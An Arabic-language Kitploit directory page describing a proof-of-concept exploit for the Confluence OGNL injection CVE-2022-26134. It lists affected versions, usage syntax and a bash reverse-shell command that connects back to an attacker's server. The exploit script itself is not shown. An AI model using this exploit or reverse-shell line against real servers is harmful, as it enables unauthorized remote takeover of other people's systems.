Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26134 — يمكن للمهاجم عن بُعد، دون مصادقة في Confluence، إنشاء تعبير OGNL وحقنه، مما يتيح تنفيذ كود عشوائي على Confluence Server أو Data Center. تم تعديل الـ PoC بناءً على السكربت الحالي لتسهيل الحصول على shell. | Kitploit
أدوات/GitHubGitHub/keven1z/cve-2022-26134
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubkeven1z/cve-2022-26134

CVE-2022-26134

يمكن للمهاجم عن بُعد، دون مصادقة في Confluence، إنشاء تعبير OGNL وحقنه، مما يتيح تنفيذ كود عشوائي على Confluence Server أو Data Center. تم تعديل الـ PoC بناءً على السكربت الحالي لتسهيل الحصول على shell.

عرض المستودع
72منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26134

يمكن للمهاجم عن بُعد، دون الحاجة إلى مصادقة، إنشاء تعبير OGNL وحقنه لتنفيذ تعليمات برمجية عشوائية على Confluence Server أو Data Center. تم تعديل الـ PoC لتسهيل الحصول على شل (getshell). المنفذ الشائع: 8090

الإصدارات المتأثرة

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

تعليمات الاستخدام

root@kitploit:~
pip3 install requests
root@kitploit:~
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

الاستخدام

root@kitploit:~
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令

هذا السكربت مخصص للاستخدام الاختباري فقط، ولا يجوز استخدامه لأغراض أخرى.

تنزيل الأداة